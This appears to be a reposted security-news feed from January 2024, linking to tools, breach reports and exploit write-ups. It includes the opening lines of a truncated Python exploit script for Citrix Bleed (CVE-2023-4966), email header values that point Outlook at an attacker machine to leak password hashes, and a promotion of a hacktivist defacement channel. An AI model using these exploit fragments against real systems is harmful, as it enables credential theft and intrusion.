■■■■□ Route-Detect – Find Authentication (Authn) And Authorization (Authz) Security Bugs In Web Application Routes. https://github.com/mschwager/route-detect https://www.kitploit.com/2024/01/route-detect-find-authentication-authn.html https://t.me/cKure/13428
All posts tagged cyber
January 27, 2024 at 12:35PM
■■■■□ Cyber-War between Israel and Palestine groups. Telegram channel of the hacktivist group that lists mostly defaced websites. ● The channel is not available on telegram downloaded from Google Play Store or other western / genocide backed tech companies. https://t.me/HizbullahCyb3rTeam https://t.me/cKure/13427
January 26, 2024 at 08:29PM
Citrix Bleed Zero-Day CVE-2023-4966 by AssetNote team. #!/usr/bin/env python3 import sys import requests import urllib3 import argparse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) parser = argparse.ArgumentParser() parser.add_argument(‘–target’, help=’The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)’) args = parser.parse_args() if args.target is None: print(‘Target must be provided (e.g. –target 192.168.1.200)’) sys.exit(0) hostname = args.target if name == “main”:…
January 26, 2024 at 11:20AM
■■■■□ 3 Years in Prison for Fraudster Who Drove SMS-Blasting IMSI-Catcher around Norway. https://www.okokrim.no/doemt-til-3-aar-i-fengsel-etter-digitalt-massebedrageri-i-oslo-og-bergen.6643270-549344.html https://commsrisk.com/3-years-in-prison-for-fraudster-who-drove-sms-blasting-imsi-catcher-around-norway/ https://t.me/cKure/13424
January 23, 2024 at 11:52AM
■■■■■ TeamCity Intrusion Saga: APT29 Suspected Among the Attackers Exploiting CVE-2023-42793. https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793 https://t.me/cKure/13422
January 23, 2024 at 08:24AM
■■■□□ How Google’s security engineering team handles rollouts at scale, so we can safely enforce Strict CSP, Trusted Types and other security features on 100s new services yearly. https://bughunters.google.com/blog/5896512897417216/a-recipe-for-scaling-security https://t.me/cKure/13421
January 23, 2024 at 08:23AM
■■■■□ Domain Escalation – Backup Operator. https://pentestlab.blog/2024/01/22/domain-escalation-backup-operator/ https://t.me/cKure/13420
January 23, 2024 at 08:22AM
Building an Exploit for FortiGate Vulnerability CVE-2023-27997. https://bishopfox.com/blog/building-exploit-fortigate-vulnerability-cve-2023-27997 https://t.me/cKure/13419
January 22, 2024 at 02:28PM
■■■■■ New Outlook Flaw Let Attackers Access Hashed Passwords. New Outlook Flaw Let Attackers Access Hashed Passwords The headers that can be used for exploitation are, ● “Content-Class” = “Sharing” — tells Outlook that this email contains sharing content. ●“x-sharing-config-url” = \\(Attacker machine)\a.ics — points the victim’s Outlook to the attacker’s machine. https://t.me/cKure/13418
January 22, 2024 at 02:23PM
■■■■□ VMware confirms critical vCenter flaw now exploited in attacks. https://www.bleepingcomputer.com/news/security/vmware-confirms-critical-vcenter-flaw-now-exploited-in-attacks/ https://t.me/cKure/13417